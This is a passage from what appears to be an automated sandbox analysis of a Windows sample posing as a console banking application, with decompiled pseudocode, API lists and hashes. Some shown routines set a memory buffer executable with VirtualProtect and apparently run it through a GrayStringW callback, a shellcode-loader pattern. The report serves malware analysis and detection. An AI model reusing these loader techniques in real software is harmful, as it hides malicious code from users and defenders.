                                                				GrayStringW(_v24(0), 0, 0,  &_v7712,  &_v1048, 0, 0, 0, 0);
                                                				E012321E0( &_v7712, _t176, _t177, __eflags);
                                                				while(1) {
                                                					E01231380(_t176, _t177, __eflags, 8, 9, 0x46, 0xd);
                                                					E012312B0(0xa, 0xb);
                                                					_push("Press A to Log in as ADMINISTRATOR or S to log in as STAFF\n\n\n\t\t\t\t\t");
                                                					E0123715C(_t133, _t176, _t177, __eflags);
                                                					_t180 = _t180 + 4;
                                                					__eflags = (_v5 & 0x000000ff) - 0x41;
                                                					if((_v5 & 0x000000ff) == 0x41) {
                                                						break;
                                                					}
                                                					__eflags = (_v5 & 0x000000ff) - 0x61;
                                                					if((_v5 & 0x000000ff) != 0x61) {
                                                						__eflags = (_v5 & 0x000000ff) - 0x53;
                                                						if((_v5 & 0x000000ff) == 0x53) {
                                                							L10:
                                                							E01233610(_t133, _t176, _t177, _t184);
                                                						} else {
                                                							__eflags = (_v5 & 0x000000ff) - 0x73;
                                                							if((_v5 & 0x000000ff) != 0x73) {
                                                								__eflags = (_v5 & 0x000000ff) - 0x1b;
                                                								if((_v5 & 0x000000ff) == 0x1b) {
                                                									E012377B1(0);
                                                								}
                                                								__eflags = 1;
                                                								if(1 != 0) {
                                                									continue;
                                                								}
                                                							} else {
                                                								goto L10;
                                                							}
                                                						}
                                                					} else {
                                                						break;
                                                					}
                                                					L14:
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				E012322F0(_t176, _t177, _t184);
                                                				goto L14;
                                                			}

























                                                0x01231040
                                                0x01231040
                                                0x01231040
                                                0x01231040
                                                0x01231048
                                                0x01231058
                                                0x0123105b
                                                0x0123106e
                                                0x0123107f
                                                0x01231098
                                                0x012310b1
                                                0x012310c2
                                                0x012310d1
                                                0x012310dd
                                                0x012310f0
                                                0x012310f5
                                                0x012310f8
                                                0x0123110a
                                                0x01231121
                                                0x0123112b
                                                0x01231134
                                                0x01231141
                                                0x0123114b
                                                0x01231155
                                                0x0123115f
                                                0x01231172
                                                0x0123117b
                                                0x01231185
                                                0x0123118e
                                                0x01231198
                                                0x012311a1
                                                0x012311ab
                                                0x012311b4
                                                0x012311be
                                                0x012311d1
                                                0x012311db
                                                0x012311e4
                                                0x012311ed
                                                0x01231107
                                                0x01231107
                                                0x0123120b
                                                0x0123122e
                                                0x01231231
                                                0x01231236
                                                0x0123123e
                                                0x01231247
                                                0x0123124c
                                                0x01231251
                                                0x01231256
                                                0x0123125d
                                                0x01231260
                                                0x00000000
                                                0x00000000
                                                0x01231266
                                                0x01231269
                                                0x01231276
                                                0x01231279
                                                0x01231284
                                                0x01231284
                                                0x0123127b
                                                0x0123127f
                                                0x01231282
                                                0x0123128f
                                                0x01231292
                                                0x01231296
                                                0x01231296
                                                0x012312a0
                                                0x012312a2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01231282
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x012312a4
                                                0x012312a4
                                                0x012312a9
                                                0x012312a9
                                                0x0123126b
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,012389A2,01230000,00000000,00000000), ref: 01231052
                                                  • Part of subcall function 01236B80: GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B8C
                                                  • Part of subcall function 01236B80: RtlAllocateHeap.NTDLL(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B93
                                                  • Part of subcall function 01236B80: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BCD
                                                  • Part of subcall function 01236B80: HeapAlloc.KERNEL32(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BD4
                                                • LoadLibraryW.KERNEL32(User32.dll,23FDEF72,?,0E0BAA99,?,B616C5D9,?,012389A2,01230000,00000000,00000000), ref: 0123108C
                                                • LoadLibraryW.KERNEL32(User32.dll,695C9378,00000000,?,012389A2,01230000,00000000,00000000), ref: 012310A5
                                                • _memmove.LIBCMT ref: 012310F0
                                                • VirtualProtect.KERNELBASE(?,00001A05,00000040,?), ref: 0123120B
                                                • GrayStringW.USER32(00000000), ref: 0123122E
                                                • _wprintf.LIBCMT ref: 01231251
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Heap$LibraryLoadProcess$AllocAllocateGrayHandleModuleProtectStringVirtual_memmove_wprintf
                                                • String ID: IEUCIZEO$Kernel32.dll$Press A to Log in as ADMINISTRATOR or S to log in as STAFF$User32.dll$User32.dll
                                                • API String ID: 1383926253-1224953502
                                                • Opcode ID: f1cfb7da98e0fbe52f0e95d8b6ba0e414f76b35301000ca7434cbb7e7ed0b6dd
                                                • Instruction ID: 08afd9cc00af8b1cae2df22be8b0b0cae08a55812a14bfa0ec7aad7eb6c1d1d6
                                                • Opcode Fuzzy Hash: f1cfb7da98e0fbe52f0e95d8b6ba0e414f76b35301000ca7434cbb7e7ed0b6dd
                                                • Instruction Fuzzy Hash: 56719CB4D5C2E9BADF01DBF988507FDBFB45F9A201F0880C9E5D1B6282C675474A8B21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 41%
                                                			E01236B80(void* __ecx) {
                                                				void* _v8;
                                                				void* _t5;
                                                				void* _t7;
                                                				void* _t14;
                                                
                                                				_t14 = __ecx;
                                                				_push(__ecx);
                                                				_t5 = RtlAllocateHeap(GetProcessHeap(), 1, 0x17d78400); // executed
                                                				_v8 = _t5;
                                                				_push(_t5);
                                                				if(_t5 != 0x11) {
                                                					asm("cld");
                                                				}
                                                				asm("clc");
                                                				_pop(_t7);
                                                				if(_v8 != 0) {
                                                					E01236C50(_t14, _v8, 0x17d78400);
                                                					_push(_t11);
                                                					asm("cld");
                                                					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
                                                				}
                                                				return _t7;
                                                			}







                                                0x01236b80
                                                0x01236b83
                                                0x01236b93
                                                0x01236b99
                                                0x01236b9c
                                                0x01236ba0
                                                0x01236ba4
                                                0x01236ba5
                                                0x01236ba9
                                                0x01236baa
                                                0x01236baf
                                                0x01236bbd
                                                0x01236bc2
                                                0x01236bc7
                                                0x01236bd4
                                                0x01236bd4
                                                0x01236bde

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B8C
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B93
                                                • GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BCD
                                                • HeapAlloc.KERNEL32(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BD4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Heap$Process$AllocAllocate
                                                • String ID:
                                                • API String ID: 1154092256-0
                                                • Opcode ID: 9d32400fe9f1ef8343a48647ed340ec4f746033d1e610f2c6704cf9cfc0f26bf
                                                • Instruction ID: 9dae238677a1239a02aa92dfad56ca1e7c34d6a8839d004e10bf93faf7fc9f44
                                                • Opcode Fuzzy Hash: 9d32400fe9f1ef8343a48647ed340ec4f746033d1e610f2c6704cf9cfc0f26bf
                                                • Instruction Fuzzy Hash: B8F0E2B5560618BFE7106AF8BC0DFABB79CE704309F201544F604D3240D5B25A008B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				intOrPtr _t17;
                                                				intOrPtr _t23;
                                                				void* _t24;
                                                				void* _t25;
                                                				void* _t26;
                                                				intOrPtr _t28;
                                                				signed int _t38;
                                                				void* _t40;
                                                				void* _t46;
                                                				signed int _t49;
                                                				void* _t51;
                                                				void* _t53;
                                                				void* _t60;
                                                
                                                				_t60 = __fp0;
                                                				_t47 = __edi;
                                                				_t46 = __edx;
                                                				E0123FC48();
                                                				_push(0x14);
                                                				_push(0x124d838);
                                                				E01239160(__ebx, __edi, __esi);
                                                				_t49 = E0123C013() & 0x0000ffff;
                                                				E0123FBFB(2);
                                                				_t53 =  *0x1230000 - 0x5a4d; // 0x5a4d
                                                				if(_t53 == 0) {
                                                					_t17 =  *0x123003c; // 0xf0
                                                					__eflags =  *((intOrPtr*)(_t17 + 0x1230000)) - 0x4550;
                                                					if( *((intOrPtr*)(_t17 + 0x1230000)) != 0x4550) {
                                                						goto L2;
                                                					} else {
                                                						__eflags =  *((intOrPtr*)(_t17 + 0x1230018)) - 0x10b;
                                                						if( *((intOrPtr*)(_t17 + 0x1230018)) != 0x10b) {
                                                							goto L2;
                                                						} else {
                                                							_t38 = 0;
                                                							__eflags =  *((intOrPtr*)(_t17 + 0x1230074)) - 0xe;
                                                							if( *((intOrPtr*)(_t17 + 0x1230074)) > 0xe) {
                                                								__eflags =  *(_t17 + 0x12300e8);
                                                								_t6 =  *(_t17 + 0x12300e8) != 0;
                                                								__eflags = _t6;
                                                								_t38 = 0 | _t6;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L2:
                                                					_t38 = 0;
                                                				}
                                                				 *(_t51 - 0x1c) = _t38;
                                                				if(E0123D058() == 0) {
                                                					E012389F5(0x1c);
                                                				}
                                                				if(E0123D6D2(_t38, _t47) == 0) {
                                                					_t19 = E012389F5(0x10);
                                                				}
                                                				E0123BE1F(_t19);
                                                				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
                                                				E0123A5C3();
                                                				 *0x1254080 = GetCommandLineA(); // executed
                                                				_t23 = E0123FCE2(); // executed
                                                				 *0x1252284 = _t23;
                                                				_t24 = E0123F8ED();
                                                				_t56 = _t24;
                                                				if(_t24 < 0) {
                                                					E0123751F(_t38, _t46, _t47, _t49, _t56, 8);
                                                				}
                                                				_t25 = E0123FB1A(_t38, _t46, _t47, _t49);
                                                				_t57 = _t25;
                                                				if(_t25 < 0) {
                                                					E0123751F(_t38, _t46, _t47, _t49, _t57, 9);
                                                				}
                                                				_t26 = E01237559(_t47, _t49, 1);
                                                				_pop(_t40);
                                                				_t58 = _t26;
                                                				if(_t26 != 0) {
                                                					E0123751F(_t38, _t46, _t47, _t49, _t58, _t26);
                                                					_pop(_t40);
                                                				}
                                                				_t28 = E01231040(_t40, _t47, _t49, _t58, _t60, 0x1230000, 0, E0123FD6D(), _t49); // executed
                                                				_t50 = _t28;
                                                				 *((intOrPtr*)(_t51 - 0x24)) = _t28;
                                                				if(_t38 == 0) {
                                                					E012377B1(_t50);
                                                				}
                                                				E0123754A();
                                                				 *(_t51 - 4) = 0xfffffffe;
                                                				return E012391A5(_t50);
                                                			}
















                                                0x012388a7
                                                0x012388a7
                                                0x012388a7
                                                0x012388a7
                                                0x012388b1
                                                0x012388b3
                                                0x012388b8
                                                0x012388c2
                                                0x012388c7
                                                0x012388d2
                                                0x012388d9
                                                0x012388df
                                                0x012388e4
                                                0x012388ee
                                                0x00000000
                                                0x012388f0
                                                0x012388f5
                                                0x012388fc
                                                0x00000000
                                                0x012388fe
                                                0x012388fe
                                                0x01238900
                                                0x01238907
                                                0x01238909
                                                0x0123890f
                                                0x0123890f
                                                0x0123890f
                                                0x0123890f
                                                0x01238907
                                                0x012388fc
                                                0x012388db
                                                0x012388db
                                                0x012388db
                                                0x012388db
                                                0x01238912
                                                0x0123891c
                                                0x01238920
                                                0x01238925
                                                0x0123892d
                                                0x01238931
                                                0x01238936
                                                0x01238937
                                                0x0123893c
                                                0x01238940
                                                0x0123894b
                                                0x01238950
                                                0x01238955
                                                0x0123895a
                                                0x0123895f
                                                0x01238961
                                                0x01238965
                                                0x0123896a
                                                0x0123896b
                                                0x01238970
                                                0x01238972
                                                0x01238976
                                                0x0123897b
                                                0x0123897e
                                                0x01238983
                                                0x01238984
                                                0x01238986
                                                0x01238989
                                                0x0123898e
                                                0x0123898e
                                                0x0123899d
                                                0x012389a2
                                                0x012389a4
                                                0x012389a9
                                                0x012389ac
                                                0x012389ac
                                                0x012389b1
                                                0x012389e6
                                                0x012389f4

                                                APIs
                                                • ___security_init_cookie.LIBCMT ref: 012388A7
                                                  • Part of subcall function 0123C013: GetStartupInfoW.KERNEL32(?), ref: 0123C01D
                                                • _fast_error_exit.LIBCMT ref: 01238920
                                                • _fast_error_exit.LIBCMT ref: 01238931
                                                • __RTC_Initialize.LIBCMT ref: 01238937
                                                • __ioinit0.LIBCMT ref: 01238940
                                                • GetCommandLineA.KERNEL32(0124D838,00000014), ref: 01238945
                                                • ___crtGetEnvironmentStringsA.LIBCMT ref: 01238950
                                                • __setargv.LIBCMT ref: 0123895A
                                                • __setenvp.LIBCMT ref: 0123896B
                                                • __cinit.LIBCMT ref: 0123897E
                                                • __wincmdln.LIBCMT ref: 0123898F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
                                                • String ID:
                                                • API String ID: 1504447550-0
                                                • Opcode ID: 1db386982e46f10f23fcd98f99f45147b105bdf8e9ce75bcd7cf12a2ab20f1f7
                                                • Instruction ID: acb88bd50112b435b4ca55ab7925efa647529ededd94379bb1d7c77e9e9c0735
                                                • Opcode Fuzzy Hash: 1db386982e46f10f23fcd98f99f45147b105bdf8e9ce75bcd7cf12a2ab20f1f7
                                                • Instruction Fuzzy Hash: 3A210AF0A303079AEF297BB87989B3D61546FE0711F100629FA05AF1C1EFB485459767
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 100%
                                                			E0123C0A3(struct _EXCEPTION_POINTERS* _a4) {
                                                
                                                				SetUnhandledExceptionFilter(0);
                                                				return UnhandledExceptionFilter(_a4);
                                                			}



                                                0x0123c0a8
                                                0x0123c0b8

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,01238B1A,?,?,?,00000000), ref: 0123C0A8
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0123C0B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: f07e55e408fea064b64d31ce8f77d5590b46f5c10bd44d9f7e43504302f8a1ee
                                                • Instruction ID: 474f43af6f0123d3556a5aaaff909f9c2ceaafd7d207299cdd07be9476c1cf24
                                                • Opcode Fuzzy Hash: f07e55e408fea064b64d31ce8f77d5590b46f5c10bd44d9f7e43504302f8a1ee
                                                • Instruction Fuzzy Hash: 9BB09239064208EBCB102BD1FC0EB587F28EB05656F008011F60E444559BB254108BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33b5cc760507b07f7b37d822460c3f0956fecf1d4cb3184e06b095bb2a51f1e4
                                                • Instruction ID: c6ec6e40c78f0cd840a65c76f6145ba30c5257a9897b71717520329dbdeb743d
                                                • Opcode Fuzzy Hash: 33b5cc760507b07f7b37d822460c3f0956fecf1d4cb3184e06b095bb2a51f1e4
                                                • Instruction Fuzzy Hash: 67321675D39F014ED7239938D826336A649AFF73C4F15D727E81AB5D9AEB28C4834200
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0123C080(_Unknown_base(*)()* _a4) {
                                                
                                                				return SetUnhandledExceptionFilter(_a4);
                                                			}



                                                0x0123c08d

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0123F78E,0123F743,?,00000000,00000000,00000000,00000000), ref: 0123C086
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 06ffc27f8501c8ffec553863344e29cc95cb5279e1d1a8fc65dfcffa9c0c72f5
                                                • Instruction ID: 49162a15618c75bc0ccba51364b6b2a2b8624dd42f398d1366ef59284b811eb0
                                                • Opcode Fuzzy Hash: 06ffc27f8501c8ffec553863344e29cc95cb5279e1d1a8fc65dfcffa9c0c72f5
                                                • Instruction Fuzzy Hash: 2DA0113800020CAB8B002A82FC088883F2CEA022A8B000022F80C008208B22A8208A80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673377230.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 528a4f16991854913c462da7ad73e791a05de82d13dc41471258f931d0ebd2d2
                                                • Instruction ID: 06b534e02bead5419421e3039af72388bc75cf6225fba8df9f08e12b2d0fc52e
                                                • Opcode Fuzzy Hash: 528a4f16991854913c462da7ad73e791a05de82d13dc41471258f931d0ebd2d2
                                                • Instruction Fuzzy Hash: 81E09A36660508EFDB04CBA8DC81D15B3E8EB08360B1002A0FC15C73A2D738EE008A10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673377230.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                                • Instruction ID: fb937c5b6dd95f4fe9c6eb858acb43b68fd5b8d575dc0af144de4e0d042afe16
                                                • Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                                • Instruction Fuzzy Hash: 30E0DF33610504DBD7219B09D800D92F7E8EB987F0B054432FD4893612C234FC00C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01236A00() {
                                                
                                                				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                			}



                                                0x01236a17

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673377230.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673377230.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                                • Instruction ID: 19d0ff3b22517dd07c48b8d54ea725715d330d41c52538c0504f2394f0e18c16
                                                • Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                                • Instruction Fuzzy Hash: 53B092616154884AEB52C3248415B1176E0A740B01F8A94E0E00582882C25CE984A200
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673377230.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f377ddc5f06dfc3153ea0c28b0a1464ef23ffe7e410e0425465c082cb6f6e04
                                                • Instruction ID: cb197d2559c09660318d3d12e6cb9f80cf1b08a2d0c32daa4285e7c7a95ab15a
                                                • Opcode Fuzzy Hash: 3f377ddc5f06dfc3153ea0c28b0a1464ef23ffe7e410e0425465c082cb6f6e04
                                                • Instruction Fuzzy Hash: ECA00179152A809BD7128B55D558B9476A4B748A44F9544A4D40546A51827C5504CE04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 62%
                                                			E01233610(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				intOrPtr _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				char _v36;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v63;
                                                				char _v67;
                                                				char _v68;
                                                				char _v80;
                                                				char _v92;
                                                				char _v124;
                                                				char _v156;
                                                				void* __ebp;
                                                				intOrPtr _t58;
                                                				intOrPtr _t60;
                                                				void* _t61;
                                                				void* _t98;
                                                				void* _t99;
                                                				void* _t108;
                                                				intOrPtr _t111;
                                                				void* _t121;
                                                				void* _t122;
                                                				void* _t123;
                                                				void* _t127;
                                                				void* _t128;
                                                				void* _t129;
                                                				void* _t130;
                                                				void* _t131;
                                                				void* _t139;
                                                				void* _t148;
                                                
                                                				_t148 = __fp0;
                                                				_t122 = __esi;
                                                				_t121 = __edi;
                                                				_t108 = __ebx;
                                                				_v68 = 0;
                                                				_v67 = 0;
                                                				_v63 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v12 = 0;
                                                				_v20 = 0;
                                                				_v20 = 0;
                                                				do {
                                                					E01231380(_t121, _t122, 0, 0xa, 8, 0x46, 0xf);
                                                					E012312B0(7, 5);
                                                					_push("Only THREE attempts shall be allowed to enter username and password.");
                                                					E0123715C(_t108, _t121, _t122, 0);
                                                					E012312B0(0x17, 0xa);
                                                					_push("Enter User name : ");
                                                					E0123715C(_t108, _t121, _t122, 0);
                                                					E0123738B("%s", 0x1252ee4);
                                                					E012312B0(0x17, 0xc);
                                                					_push("Password        : ");
                                                					E0123715C(_t108, _t121, _t122, 0);
                                                					_t127 = _t123 + 0x14;
                                                					E012312F0(_t121, _t122,  &_v68);
                                                					_v20 = _v20 + 1;
                                                					_t143 = _v20 - 3;
                                                					if(_v20 == 3) {
                                                						E012320E0( &_v68, _t121, _t122, _t143, _t148);
                                                						E012312B0(0x19, 0xa);
                                                						_push(0x124fb98);
                                                						E0123715C(_t108, _t121, _t122, _t143);
                                                						E012312B0(0x16, 0xc);
                                                						_push("Press ENTER to exit the program...");
                                                						E0123715C(_t108, _t121, _t122, _t143);
                                                						_t127 = _t127 + 8;
                                                						E012377B1(0);
                                                					}
                                                					_v12 = 0;
                                                					_t58 = E01236EF1("USER.DAT", "r");
                                                					_t128 = _t127 + 8;
                                                					 *0x1252f28 = _t58;
                                                					while(1) {
                                                						_push( &_v156);
                                                						_push( &_v124);
                                                						_t60 =  *0x1252f28; // 0x0
                                                						_t61 = E01237021(_t60, "%s %s %s\n",  &_v92);
                                                						_t129 = _t128 + 0x14;
                                                						if(_t61 == 0xffffffff) {
                                                							break;
                                                						}
                                                						_t98 = E01238230(0x1252ee4,  &_v124);
                                                						_t128 = _t129 + 8;
                                                						if(_t98 == 0) {
                                                							_t99 = E01238230(0x1252f02,  &_v156);
                                                							_t128 = _t128 + 8;
                                                							if(_t99 == 0) {
                                                								_v12 = _v12 + 1;
                                                							}
                                                						}
                                                					}
                                                					_t111 =  *0x1252f28; // 0x0
                                                					_push(_t111);
                                                					E01236DB6(_t108, _t121, _t122, __eflags);
                                                					_t130 = _t129 + 4;
                                                					E012320E0(_t111, _t121, _t122, __eflags, _t148);
                                                					__eflags = _v12;
                                                					if(__eflags == 0) {
                                                						goto L10;
                                                					}
                                                					break;
                                                					L10:
                                                					E012312B0(0xa, 0xa);
                                                					_push(0x124fbf8);
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					_t123 = _t130 + 4;
                                                					__eflags = 1;
                                                				} while (1 != 0);
                                                				E01238417(__eflags,  &_v80);
                                                				_t131 = _t130 + 4;
                                                				E01233AB0(_t108, _t121, _t122, _t148);
                                                				do {
                                                					E012320E0(_t111, _t121, _t122, __eflags, _t148);
                                                					E012312B0(0xf, 8);
                                                					_push("1. Create New Account\n");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0xa);
                                                					_push("2. Cash Deposit");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0xc);
                                                					_push("3. Cash Withdrawl");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0xe);
                                                					_push("4. Fund Transfer");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0xf, 0x10);
                                                					_push("5. Account information");
                                                					E0123715C(_t108, _t121, _t122, __eflags);
                                                					E012312B0(0x2d, 8);
                                                					_push("6. Transaction information");
